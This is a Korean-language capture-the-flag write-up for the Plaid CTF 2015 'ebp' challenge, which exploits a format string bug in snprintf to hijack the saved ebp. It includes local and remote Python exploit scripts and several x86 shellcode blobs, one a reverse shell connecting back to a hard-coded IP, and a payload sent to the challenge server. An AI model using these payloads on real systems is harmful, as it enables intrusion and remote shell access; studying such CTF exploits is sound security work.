[Plaid CTF 2015] ebp (160pt) write-up

PWNABLE – ebp 160pt

 

 

1. 문제

fgets 함수를 이용해 bss영역의 변수인 buf에 최대 1024바이트만큼 입력을 받는다.

그 후 실행되는 echo함수다.

make_response 함수를 실행하고, puts를 통해 bss영역의 변수인 response를 출력한다.

make_response함수는 snprintf를 이용해 buf의 값을 최대 1024바이트만큼 response에 복사한다.

2. 취약점

프로그램의 전체적인 흐름을 보면, buf에 입력을 받고 그 값을 response에 복사한 후, 그 값을 출력시킨다.

사용자의 입력 값을 출력시켜주는 프로그램이다.

 

response와 buf는 1024바이트이기 때문에 bof취약점은 없다.

혹시나 하고 %x를 입력해봤더니 스택의 값이 출력됐다.

printf 함수에서 발생하는 포맷스트링 버그가 snprintf에서도 나타났다.

 

스택에 쌓여있는 값들을 조작하여 공격해보자.

스택에 있는 값들을 확인했다.

네 번째 위치에 echo함수의 ebp가 있다.

ebp를 조작하면 eip를 컨트롤할 수 있다.

buf에 쉘코드와 쉘코드의 주소를 쓰고, 포맷스트링 버그를 이용하여 main의 ebp를 쉘코드의 주소가 쓰여진 주소 -4의 주소로 바꿨다.

 

3. Exploit

local

''' shell = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66" #13 shell += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xa8" #26 shell += "\xbc\x81\x9f\x68\x02\x00\x04\xd2\x89\xe1\xb0\x66\x50" #39 shell += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73" #52 shell += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0" #65 shell += "\x0b\xcd\x80" #68 ''' shell='a'+'\xae\xa0\x04\x08'*6+'\x90'*6+'\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\x31\xc0\xb0\x46\xcd \x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b \xcd\x80'   payload = "\x84\xa0\x04\x08"  #shell code payload += "aaaaaaaaaaaa" payload += shell # 4 + 68 = 72 bytes payload += "bbbbbbbbbbbbb" payload += "%.134520884u%4$n" payload += "cccccccccccc"   #print payload     shell = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0 \x0b\xcd\x80" payload = "\x84\xa0\x04\x08" payload += shell payload += "%.134520927u%4$n"   #print payload     shell = "\xb8\xa7\xd5\x0f\x43\xda\xda\xd9\x74\x24\xf4\x5a\x2b\xc9"+\ "\xb1\x12\x83\xea\xfc\x31\x42\x0e\x03\xe5\xdb\xed\xb6\xd8" +\ "\x38\x06\xdb\x49\xfc\xba\x76\x6f\x8b\xdc\x37\x09\x46\x9e" +\ "\xab\x8c\xe8\xa0\x06\xae\x40\xa6\x61\xc6\xfa\xe4\x13\x89" +\ "\x93\x16\x14\xa4\x3f\x9e\xf5\x76\xd9\xf0\xa4\x25\x95\xf2" +\ "\xcf\x28\x14\x74\x9d\xc2\x88\x5a\x51\x7a\xbf\x8b\xf7\x13" +\ "\x51\x5d\x14\xb1\xfe\xd4\x3a\x85\x0a\x2a\x3c"   shell = "\xb8\x6e\x8b\xa7\xaa\xdb\xc3\xd9\x74\x24\xf4\x5f\x2b\xc9" +\ "\xb1\x12\x31\x47\x12\x03\x47\x12\x83\x81\x77\x45\x5f\x6c" +\ "\x53\x7d\x43\xdd\x20\xd1\xee\xe3\x2f\x34\x5e\x85\xe2\x37" +\ "\x0c\x10\x4d\x08\xfe\x22\xe4\x0e\xf9\x4a\x5f\x4c\x78\x15" +\ "\xf7\xaf\x7b\x38\x54\x39\x9a\x8a\x02\x69\x0c\xb9\x79\x8a" +\ "\x27\xdc\xb3\x0d\x65\x76\x63\x21\xf9\xee\x13\x12\x9f\x87" +\ "\x8d\xe5\xbc\x05\x01\x7f\xa3\x19\xae\xb2\xa4"   shell = "\xbb\xbc\xb8\x22\x54\xdd\xc3\xd9\x74\x24\xf4\x5e\x2b\xc9" +\ "\xb1\x12\x31\x5e\x12\x83\xee\xfc\x03\xe2\xb6\xc0\xa1\x2b" +\ "\x1c\xf3\xa9\x18\xe1\xaf\x47\x9c\x6c\xae\x28\xc6\xa3\xb1" +\ "\xda\x5f\x8c\x8d\x11\xdf\xa5\x88\x50\xb7\x9d\xd7\x22\xd8" +\ "\xb6\x25\x25\xe7\xfa\xa3\xc4\x57\x64\xe4\x57\xc4\xda\x07" +\ "\xd1\x0b\xd1\x88\xb3\xa3\xc5\xa7\x40\x5b\x72\x97\xc4\xf2" +\ "\xec\x6e\xeb\x56\xa2\xf9\x0d\xe6\x4f\x37\x4d"     payload = "\xb4\xa0\x04\x08" payload += "\x90"*100 payload += shell payload += "%.134520758u%4$n"   print payload

remote

from socket import * from struct import * import sys import os import time p = lambda x : struct.pack("<L",x) up = lambda x : unpack("<L",x)   host = "52.6.64.173" port = 4545   shell = "" shell += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66" #13 shell += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xa8" #26 shell += "\xbc\x81\x9f\x68\x02\x00\x04\xd2\x89\xe1\xb0\x66\x50" #39 shell += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73" #52 shell += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0" #65 shell += "\x0b\xcd\x80" #68   shell = "\xb8\x6e\x8b\xa7\xaa\xdb\xc3\xd9\x74\x24\xf4\x5f\x2b\xc9" +\ "\xb1\x12\x31\x47\x12\x03\x47\x12\x83\x81\x77\x45\x5f\x6c" +\ "\x53\x7d\x43\xdd\x20\xd1\xee\xe3\x2f\x34\x5e\x85\xe2\x37" +\ "\x0c\x10\x4d\x08\xfe\x22\xe4\x0e\xf9\x4a\x5f\x4c\x78\x15" +\ "\xf7\xaf\x7b\x38\x54\x39\x9a\x8a\x02\x69\x0c\xb9\x79\x8a" +\ "\x27\xdc\xb3\x0d\x65\x76\x63\x21\xf9\xee\x13\x12\x9f\x87" +\ "\x8d\xe5\xbc\x05\x01\x7f\xa3\x19\xae\xb2\xa4"   shell = "\xbb\xbc\xb8\x22\x54\xdd\xc3\xd9\x74\x24\xf4\x5e\x2b\xc9" +\ "\xb1\x12\x31\x5e\x12\x83\xee\xfc\x03\xe2\xb6\xc0\xa1\x2b" +\ "\x1c\xf3\xa9\x18\xe1\xaf\x47\x9c\x6c\xae\x28\xc6\xa3\xb1" +\ "\xda\x5f\x8c\x8d\x11\xdf\xa5\x88\x50\xb7\x9d\xd7\x22\xd8" +\ "\xb6\x25\x25\xe7\xfa\xa3\xc4\x57\x64\xe4\x57\xc4\xda\x07" +\ "\xd1\x0b\xd1\x88\xb3\xa3\xc5\xa7\x40\x5b\x72\x97\xc4\xf2" +\ "\xec\x6e\xeb\x56\xa2\xf9\x0d\xe6\x4f\x37\x4d"       payload = "\xb4\xa0\x04\x08" payload += "\x90"*100 payload += shell payload += "%.134520758u%4$n"     s = socket(AF_INET, SOCK_STREAM) s.connect((host,port)) #payload = "\x84\xa0\x04\x08" #shell code #payload += shell # 4 + 68 = 72 bytes #payload += "%.134520884u%4$n" #print payload #print "len shell" #print len(payload) #print "send payload"   s.send(payload)